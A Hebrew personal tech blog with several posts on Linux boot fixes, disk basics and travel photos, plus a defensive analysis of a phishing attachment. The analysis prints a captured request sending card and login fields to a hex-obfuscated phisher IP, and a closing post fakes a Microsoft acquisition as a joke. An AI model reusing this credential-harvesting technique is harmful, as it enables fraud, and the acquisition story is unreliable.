פורסם ב

השדרוגים הם מהשטן

זוכרים שהזמנתי כונן קשיח נוסף וכונן DVD חלופי במקום זה ששבק?
שניהם היו כמובן בממשק SATA, והתסבר שהמחשב שאליו הם מיועדים סבל ממחסור חמור בערוצי SATA פנויים, כל שני הערוצים שעל לוח האם שלו היו תפוסים.
בינתיים התקנתי את הדיסק במחשב השני, והזמנתי כרטיס בקר SATA שמוסיף עוד ארבעה ערוצי SATA. אתמול הוא הגיע לשמחתי, וכשחזרתי מהעבודה התיישבתי להתקין את הבקר, את הכונן הקשיח ואת הכונן DVD.
בהתחלה פשוט התקנתי את הכל, הדלקתי את המחשב וקיוויתי לטוב – תקוות שהתבדו מהר מאוד: המחשב נתקע בBOOT, לפני שהתחיל להעלות את GRUB (טוען הBOOT של לינוקס). התחלתי לשחק קצת בחיבורים וגיליתי שהמחשב לא אוהב שאני מחבר את הDVD לבקר הSATA החדש, ולכן חיברתי אותו ישירות ללוח האם ואת אחד משני הכוננים הקשיחים הישנים חיברתי לבקר הSATA. אחרי שהמחשב הצליח להכנס לGRUB כאשר כל ארבעת הכוננים מחוברים (שני הרדיסקים ישנים, אחד חדש וכונן DVD חדש), הקרנל התחיל לעלות ונתקע כמובן כשחיפש את מערכת הקבצים במחיצת השורש (/)
חשבתי לעצמי, בטח הוא לא אוהב את השינויים, וניתקתי הכל כדי לוודא שהוא עובד במצב שבו הוא היה קודם.
במפתיע, הוא עדיין סרב לעלות כשלא מצא את מערכת הקבצים של /.
עכשיו כבר התחלתי לנסות להעריך כמה זמן יקח לי להתקין את הכל מחדש ולהביא את העסק למצב עובד (זה שרת הדואר שלי, ולא רציתי להשאיר אותו לא עובד), לא אהבתי את ההערכה.
החלטתי לנסות לעלות מדיסק של Knoppix 4.0 ישן שהיה לי, אבל הוא טען שהביוס שלי דפוק במיוחד וסירב לעלות. חשבתי לעצמי שאולי הדיסק KNOPPIX דפוק במיוחד וצרבתי את Knoppix 5.1, שהסכים עם הדיסק הקודם בדיאגנוזה וסרב גם הוא לעלות.
שלפתי מהמחסן את אחד מכונני הDVD הישנים שלי, שהתעטר בכיתוב "אולי דפוק, 22/2/2008", ניסיתי אותו ומשם דווקא Knoppix הסכים לעלות (לא שכחתי לסמן את הכונן בכיתוב "מספיק טוב בשביל קנופיקס, 14/4/2008") – בשיטוט במחשב מתוך הקנופיקס שמתי לב שהכונן החדש התיישב לו על SDA ודחף את הכונן הראשון שהיה בSDA אל SDC. זה גרם לי לחשוב שאולי זו הבעיה.
ביצעתי BOOT רגיל אל GRUB, ופתאום שמתי לב שהשורה של הקרנל נראית ככה:
[code]
kernel /boot/vmlinuz-2.6.24-1-686 root=/dev/hde1 ro
[/code]
שורה שאופיינית לטעינת הקרנל מדיסק ATA רגיל ולא מSATA (שמופיע תחת sdx ולא תחת hdx).
התחלתי לנחש ולנסות כל מני אפשרויות ובסוף הצלחתי לבצע BOOT כאשר השורש בsdb2, סוף סוף קצת התקדמות!
חיברתי את כל הכוננים, ניחשתי וניחשתי שוב עד שהצלחתי עם sdc2, ונכנסתי למערכת.
לא ממה התחשק לי לשנות את הfstab ואת קובץ התפריט של GRUB לתצורה החדשה, כי ידעתי שברגע שאני אשנה משהו בחומרה הכל ישבר שוב.
נכנסתי ל#debian@irc.freenode.net, ושאלתי איך מונעים מהקרנל לשנות את שמות הכוננים כל פעם שמשהו משתנה.
ענו לי שאפשר, אבל זה קשה, ועדיף בכלל לעגן מחיצות לפי הUUID, ולא לפי שם הכונן.
UUID למחיצה? לא ידעתי שיש!
מסתבר שזה פשוט במיוחד, החל מגרסא מסויימת של הקרנל, יש בdev ספריות חדשות:
[code]
/dev/disk/by-id/
/dev/disk/by-label/
/dev/disk/by-path/
/dev/disk/by-uuid/
[/code]

הספריה שמעניינת אותנו במקרה הזה היא /dev/disk/by-uuid/ שמכילה קבצים שנראים כך:
[code]
0427f3ec-17e1-4cd1-b195-7f5bdf861a28 -> ../../sdc3
3f7f2c77-88af-4e9a-a139-ba95900e0354 -> ../../sdb1
[/code]

אלו לינקים סימבוליים שנוצרים אוטומטית, ומאפשרים גישה אל המחיצה בצורה שאינה תלויה בשם של הכונן עליו היא יושבת.
המזהה היחודי (UUID) של המחיצה לא משתנה עד שלא יוצרים מחדש את המחיצה (או אולי מפרמטים אותה, אני לא בטוח).
כמובן שאפשר להשתמש בו גם מתוך קובץ התפריט של grub:
[code]
kernel /boot/vmlinuz-2.6.24-1-686 root=/dev/disk/by-uuid/8397dc08-be26-491d-9a06-c3fc93303d82 ro
[/code]

אחרי כל זה, הכל עובד שוב, הנה נשרף לו ערב שיכול היה לשמש אותי לדברים מועילים יותר, אבל למדתי כמה דברים.

אגב, לדעתי מה שגרם לכל הסיפור הזה היה קודם כל שדרוג שביצעתי לקרנל דרך apt-get לפני מספר שבועות, שקילקל את menu.lst של GRUB.
בגלל זה גם כשניתקתי את הכל וחזרתי למצב הראשוני עדיין לא הצלחתי לבצע BOOT.
המסקנה שלי היא שצריך לבדוק טוב טוב את menu.lst אחרי שדרוג של הקרנל (אם אני אגיד את זה בקול רם אולי אני אזכור את זה בפעם הבאה!).
בנוסף, כדאי להשתמש בUUID ולא בשם הדיסק כשמעגנים מחיצות.

לבסוף, אני גאה לציין שהמחשב הסלוני שלי, שמשמש אותי כשרת דואר וכמכונת ווידאו סלונית שודרג בהצלחה ועכשיו יש לו נפח איחסון של 200+200+500=900GB.
האח, הידד.

פורסם ב

כוננים קשיחים, מחיצות ומערכות קבצים

כולם משתמשים בכוננים קשיחים, שמחולקים למחיצות שמפורמטות למערכות קבצים אלו או אחרות, אבל כמה באמת מבינים איך זה עובד?
בפוסט הזה אני אנסה להאיר את הנושא.

הכונן הקשיח
בראשית ברא הענק הכחול כונן קשיח בנפח של 5MB, מה שנשמע קצת מצחיק היום אבל די מדהים בהנתן שזה היה ב1956.
הכונן נראה פחות או יותר כמו ערמת תקליטים: 50 פלאטות שמסתובבות ב1200 סיבובים לדקה, ו50 ראשים קוראים מהדיסקים.
די איטי במונחים של היום (דיסקים היום מסתובבים ב7200 ואפילו 10000 סיבובים לדקה) אבל אם חושבים על זה, מבינים שהשיפור במהירות הסיבוב בחמישים השנה שעברו מאז שהדיסק הזה יוצר הוא מינורי לחלוטין.
למעשה, הדיסקים של היום דומים מאוד לדיסק הזה, אם לא בגודל או במחיר אז לפחות בעקרונות.
הרעיון של ראש שקורא וכותב על דיסק שמסתובב במהירות נשאר איתנו עד היום.
עכשיו, איך בדיוק ניגשים למידע שמצוי במקום כלשהו על דיסק קשיח כזה?
אחת הדרכים היא לחלק כל פלטה על ידי מעגלים ברדיוסים הולכים וגדלים שמחלקים את הפלטה לכמה צילינדרים, ועל כן נקראים צילינדרים או טראקים (מסלולים).
כל צילינדר כזה מחולק לכמה בלוקים או סקטורים. ובאמצעות שלשה של ראש,צילינדר וסקטור אפשר למצוא כל נקודה בדיסק הקשיח.
די מסורבל, אבל ככה זה עבד במשך די הרבה זמן.
כמובן שתוכנות שרוצות לכתוב או לקרוא מהדיסק לא צריכות לדעת לדעת לחשב איפה המידע נמצא על סמך מספר הראשים או הצילינדרים בדיסק – זה התפקיד של הדרייבר שמכיר את החומרה שלו באופן אישי, ואחראי לספק לתוכנות שלמעלה ממשק יותר נוח ואחיד אל הדיסק, שדימו את הדיסק למערך רציף של בתים.
אפשר לנחש שהדריברים היו די מורכבים, כי הם נדרשו לבצע חישובים מסובכים שהשתנו ממודל למודל של הדיסק.
עקב מגבלות נפח שנבעו מהשיטה הזו – יצרני הדיסקים עברו לשיטה חדשה לציין כתובת על הדיסק, במקום לציין ראש,צילינדר וסקטור – פשוט מציינים את מספר הבלוק, כאילו הדיסק הוא בעצם שטח אחיד ורציף.
השיטה הזו נקראת LBA – Logical block addressing, והיא השיטה הדומיננטית היום.
בשיטה הזו, כשניגשים למידע בסך הכל צריך לתת מספר והדיסק כבר שובר את הראש (תרתי משמע) כדי להבין באיזה פלטה המידע, באיזה צילינדר ובאיזה סקטור.
אז עכשיו, לכל בלוק יש מספר, והדיסק נראה לשאר המחשב כמו קובץ אחד גדול.

Master boot record – MBR
מערכת ההפעלה של רובנו נימצאת על הכונן הקשיח, והמחשב יודע לטעון את מערכת ההפעלה גם אם זו מערכת הפעלה שנכתבה אחרי שהמחשב יצא מהמפעל. איך זה?
ההסבר פשוט למדי, הבלוק הראשון על כל כונן קשיח מכיל קוד שהותקן על ידי מערכת ההפעלה, והוא הקוד שמעלה את שאר המערכת.
בעליה (BOOT), המחשב מחפש כונן קשיח שניתן לאיתחול, טוען את הבלוק הראשון – הידוע גם בשם MBR – לזכרון ומריץ אותו.
אותו בלוק מכיל גם את טבלאת המחיצות (לא יאמן כמה אפשר להכניס ב512 בתים, אה?), טבלאת המחיצות מגדירה חלוקה של הכונן הקשיח לכמה חלקים.
בגרסאות הראשונות, טבלאת המחיצות הכילה מקום לארבעה מחיצות בלבד, מה שנפתר מאוחר יותר באמצעות שימוש במחיצות מורחבות ושאר המצאות.
אחת המחיצות מסומנת כמחיצת הboot, והתפקיד של הקוד בMBR הוא למצוא את המחיצה הזו, ולהעביר את השליטה לקוד שנמצא על הבלוק הראשון במחיצה.
הקוד הזה בדרך כלל טוען את שאר מערכת ההפעלה.
מי ששיחק עם דוס זוכר שהיו לדוס כמה קבצי מערכת מיוחדים שהיו חייבים להיות מותקנים בשימוש בפקודת sys או format/s. מה שמיוחד בקבצים האלו זה שהם הותקנו במיקום מסויים מאוד בדיסק, וככה אותו קוד פשוט שרץ מראש המחיצה יכל למצוא את הקבצים בקלות.
אותם קבצים כבר ממש טוענים את מערכת ההפעלה, והם מתוחכמים מספיק כדי להכיר את מערכת הקבצים.
טוען הBOOT הנפוץ GRUB עובד בצורה דומה, חלק ראשון יושב בMBR והוא אחראי להפעיל את הקוד של שלב 1.5, שיושב במקום ידוע מראש על הדיסק, ואחראי בתורו לזהות את מערכת הקבצים שבה נמצאת מערכת ההפעלה, ולהתחיל לטעון אותה (בלינוקס פה מדובר בקרנל של המערכת).

מערכת הקבצים
מערכות קבצים הם אחד הנושאים המורכבים, וצריך ספר כדי לכסות כמו שצריך את הנושא, אבל אני אשתדל לגעת קצת במה שמעניין.
עד עכשיו דיברנו על בלוקים, אבל כשאנחנו עובדים עם המחשב אנחנו לא אומרים לו: טען את המידע מבלוק 42201, כתוב את המידע לבלוק 10024 – אלא מדברים איתו במונחים של קבצים: פתח את הקובץ X, כתוב לשם Y, מחק את הקובץ Z.
מערכת הקבצים היא מה שמאפשר את ההפשטה הזו.
מערכת הקבצים יושבת בתוך המחיצה (למרות שאפשר גם לפרמט את הכונן הקשיח כולו ישירות בלי טבלאת מחיצות), התפקיד של מערכת הקבצים הוא לקחת את את המחיצה, לנהל את הבלוקים שלה ולהשתמש בה כדי לכתוב ולקרוא קבצים, ליצור ספריות, לשלוט על הגישה (אבטחה) אל הקבצים ולדאוג לתקינות הקבצים גם במצבים קיצוניים – למשל כיבוי לא מתוכנן של המחשב.
יש מערכות קבצים רבות, ששונות אחת מהשניה בתכונות, במגבלות ויתרונות ובחסרונות, הנה רשימה קצרה ולא ממצה:
12/FAT16
מערכת קבצים מיושנת, שימשה את DOS. שמות קבצים מוגבלים באורכם ל8 תווים ולעוד 3 תווים לסיומת, נפח המחיצה מוגבל ל32 מגה לFAT12 ול2 ג'יגה בייט לFAT16 ,אין מאפייני אבטחה ושגיאות במערכת הקבצים הן נפוצות.

NTFS
מערכת הקבצים הסטנדרטית של חלונות NT, שנכללה בחלונות 2000, XP וויסטה בהמשך.
מודרנית, כוללת מאפייני אבטחה (ACL לכל קובץ) ותמיכה בונפחי קבצים ומחיצות עצומים.
לNTFS יש נטיה להפוך לאיטית יותר יותר ככל שמשתמשים בה.

EXT3
אחת ממערכות הקבצים הדומיננטיות במערכות לינוקס.
די מודרנית, תומכת בקבצים ומחיצות בנפחים עצומים, journaling במספר רמות ועוד.

עד כאן להפעם.

קריאה נוספת:
צילינדרים, ראשים וסקטורים.
כוננים קשיחים
איתחול
מערכות קבצים

פורסם ב

סיסמאות בממשק משתמש

כולנו התבקשנו להקליד סיסמא פעם שניה פעמים רבות.
הסיבה לכך ברורה מאליה: כשבוחרים סיסמא, מכיוון שלא רואים מה מקלידים – התוכנה מוודאת שהקלדנו נכון כדי שלא נשאר נעולים בחוץ במידה ולא הקלדנו את מה שחשבנו שהקלדנו.
עד כאן הכל טוב.
הבעיה מתחילה עם כל מני תוכנות, שמבקשות הקלדת סיסמא פעמיים בעת הכניסה למערכת.
retype-password.png
בוא נחשוב ביחד:
אם המשמש יודע את הסיסמא, הוא יקליד אותה פעמיים ויבזבז זמן.
אם המשתמש יודע את הסיסמא, אבל טעה בהקלדה, הוא יגלה שהוא טעה לפני האימות האמיתי (שהיה מגלה את זה בכל מקרה).
אם המשתמש לא יודע את הסיסמא, הוא פשוט לא יעבור את האימות האמיתי.
בכל מקרה, הרווח הקטן היחיד הוא במקרה שהמשתמש טעה בהקלדה באחת הסיסמאות (אולי דווקא בהקלדה השניה!?) ואז הוא לא יצטרך להמתין לאימות אמיתי.
בשביל הרווח המפוקפק הזה, מתכנני התוכנה בחרו להטריד את המשתמש במקרה הנפוץ הרבה יותר שבו הוא דווקא כן יודע את הסיסמא.

לדעתי תוכנות כאלו הוגדרו על ידי אנשים שלא מבינים את הברור מאליו שציינתי למעלה.
במילים אחרות, חמורי גרם.

פורסם ב

תמונות מסן פרנסיסקו

כמו שהבטחתי, תמונות מהגיחה האחרונה לסן פרנסיסקו:
כל התמונות לחיצות וסחיטות.

סן פרנסיסקו
הופעת רחוב באיזור פיר 39:


עשיתי טיול אופניים נחמד, מתחיל בפיר 39, ממשיך לאורך החוף – עולה לגשר הזהב, יורד לסולסליטו וחוזר עם פיירי לסן פרנסיסקו.




אז מהג'ונג זה משחק אמיתי?
זקנים משחקים.. משהו.. בצ'יינאטאון.


Six flags, discovery kingsdom
כמובן – רכבות הרים.


דולפינים.


אחת התמונות הטובות, מעוף האורקה.


גן החיות של סן פרנסיסקו
למורים תופסים קצת שמש בבוקר קריר, כנסו לתמונה המלאה 🙂


נשר נשר, טוב נו – עייט עייט.


ג'יראפה!


מלך החיות מרביץ פיהוק


כביש מספר 1
עשיתי סיבוב קצר (שעתיים ככה) על כביש מספר אחד, שידוע בנופי החוף שלו.
לצערי את התמונות היותר טובות לא יכלתי לצלם.. לא מומלץ לצלם עם יד אחת תוך נהיגה על צוק.


פורסם ב

טוויטר

הצטרפתי לטוויטר.
טוויטר, לשני האנשים שבדיוק חזרו מהטיול בירח – הוא שרות מיקרובלוגינג שמאפשר כתיבת פוסטים קצרים (עד 140 תווים).
הוא מאפשר לכם לעקוב אחרי אנשים אחרים בטוויטר ולאנשים אחרים לעקוב אחריכם.
אני לא יודע עד כמה אני אשתמש בזה, אבל מסקרן אותי לדעת כמה יעקבו אחרי.
התקנתי פלאגין או שניים בוורדפרס שמקשרים בין הבלוג לבין טוויטר (לשני הכיוונים), נראה כמה זמן אני אחזיק מעמד עם זה.

עקבו ברבבותיכם!

פורסם ב

טכניקת פישינג חדשה – New phishing technique

English translation below.

דייגי זהות המציאו שיטה חדשה שמסתירה בצורה טובה מאוד ממשתמש לא טכנולוגי את המהות של מה שקורה.
בניגוד לדרך המקובלת, בה המשתמש מופנה לאתר של הפישרים, שנראה כמו האתר האמיתי (Paypal, Bank of america וכדומה) – בשיטה החדשה זה מה שקורה:

1. המשתמש מקבל אימייל שנראה כאילו הגיע ממקור אמיתי (במקרה שלי מחברה בשם Moneybookers, שדי דומה לPaypal), האימייל טוען שמסיבות אבטחה ההודעה בקובץ מצורף:

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.
————————————————-
© Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.

2. הקובץ המצורף הוא קובץ HTML רגיל לחלוטין, שלא מכיל שום דבר שיהיה קל לזהות בסריקה אוטומטית (היוריסטית), ונראה כמו דף רשמי של Moneybookers,
שמטרתו למנוע גניבת זהות, וכיבוס כספים. מטרות ראויות ללא ספק, מה שעוזר להוריד את ההגנות הפסיכולוגיות של המשתמש שרוצה לעזור.

phishery.png

הדף מקשר ללוגואים וקבצים מהאתר של Moneybookers, מה שמעלה את רמת האמינות הויזואלית שלו.

3. ברגע שהמשתמש ממלא את הפרטים ולוחץ על submit, הנתונים נשלחים לשרת של של הנוכלים, ששומר אותם ומחזיר HTTP 302, שמפנה לשרת של MoneyBookers:

POST /recordings/theme/images/verification.pl.php HTTP/1.1
Host: 0x9f.0xe2.0x3a.0x88
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Iceweasel/2.0.0.12 (Debian-2.0.0.12-1)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

day=02&month=Jan&year=1912&cvv=44324&txtEmail=44&txtPassword=&txtTuring=

HTTP/1.1 302 Found
Date: Wed, 02 Apr 2008 04:13:22 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.11
Location: https://www.moneybookers.com/app/help.pl?s=laundering
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

יש כמה דברים שכדאי לשים אליהם לב (מודגשים).
* הכתובת של שרת היעד היא 0x9f.0xe2.0x3a.0x88. הדבר המוזר הזה הוא כתובת IP במסווה, מה שמקשה על המשתמשים לזהות מה קורה פה.
* התשובה היא HTTP 302, שמפנה לשרת המאובטח של MoneyBookers, מה שגורם למשתמש לחשוב שלשם הוא הגיע כשהוא לחץ על Submit.

זדוני.
הבעיה פה היא שאי אפשר למנוע מהמשתמשים להריץ קובץ HTML מקומי, ומכיוון שהמשתמשים לא ידעו שעבדו עליהם לא יהיו הרבה דיווחים על העניין, וגם אם יהיו רובם לא ישכילו להבין על מי להתלונן. ולכן כלים אוטומטים כמו זיהוי זיוף רשת של דפדפנים – שמתבסס על שרת מרכזי שאוסף תלונות מהרבה משתמשים – לא יעבדו כמו שצריך כי לא יהיו הרבה תלונות.

========== ENGLISH TRANSLATION ==========

Phishers have come up with a new method to conceal well from non-technical users the essence of what's happening.
Unlike the usual approach, where the user is pointed to a site owned by the phisher, that looks like the original site (Paypal, Bank of America etc) – this is what really happens with this approach:
1. The user receives an email that looks like it came from a real source (in my case from a Paypal like company called MoneyBookers), and that for security reason the real message is attached:

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.
————————————————-
© Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office: Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.

2. The attached HTML is a normal HTML file that does not contain anything that will be easy to detect in an automatic (heuristic) scan, and looks like an official MoneyBookers page that is supposed to help prevent identity theft and money laundering. worthy causes with no doubt – that help lower the user mental defenses that wants to help.

phishery.png

The page links to logos and files from MoneyBookers, a thing which increase it's visual reliability level.

3. When the user fills up the details and hit submit, the data is posted to the crooks site, which stores them and return HTTP 302, which redirect the user to the MoneyBookers site.

POST /recordings/theme/images/verification.pl.php HTTP/1.1
Host: 0x9f.0xe2.0x3a.0x88
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Iceweasel/2.0.0.12 (Debian-2.0.0.12-1)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ari_lang=zh_CN; ARI=afb3d2a453d93cb6f2d23ad9fb940710
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

day=02&month=Jan&year=1912&cvv=44324&txtEmail=44&txtPassword=&txtTuring=

HTTP/1.1 302 Found
Date: Wed, 02 Apr 2008 04:13:22 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.11
Location: https://www.moneybookers.com/app/help.pl?s=laundering
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

A few things to pay attention to (in bold):
* The destination post address is 0x9f.0xe2.0x3a.0x88, which is an IP address in disguise.
* The user is redirected to the real secure MoneyBookers site, which makes him think this is where he have sent his data.

Nasty.
The problem is that you can't prevent the user from running local HTML file, and since the users will not know they have been fooled there will not be many reports about this. that's why automatic tools like browser web forgery detection – that are based on a central server that collects complaints from many users – will not work well because there will not be many complaints.

פורסם ב

מייקרוסופט קונה את FireStats!

כחלק מהתחרות הבלתי פוסקת בגוגל, מייקרוסופט החליטה לקנות את פיירסטטס, ולשלב אותו בוויסטה.
המערכת המשולבת תקרא Vistats, ותתמוך בהצגת נתונים סטטיסטיים על השימוש של המשתמש במחשב דרך אתר מרכזי.
נתונים שיאספו על משתמשי וויסטה:
* התפלגות השעות בהן הממשתמש עובד על המחשב.
* התפלגות השעות בהן המשתמש משחק משחקי פלאש באינטרנט.
* התפלגות השעות בהן המשתמש צופה בסרטי פורנו.
* קבצים שנפתחים בתדירות הגבוהה ביותר.
ועוד.
כל הנתונים יהיו זמינים לכל דיכפין דרך vistats.microsoft.com.

המערכת נמכרה תמורת סכום שצונזר כדי להמנע מתשלום מס מנופח.

נשבע לכם.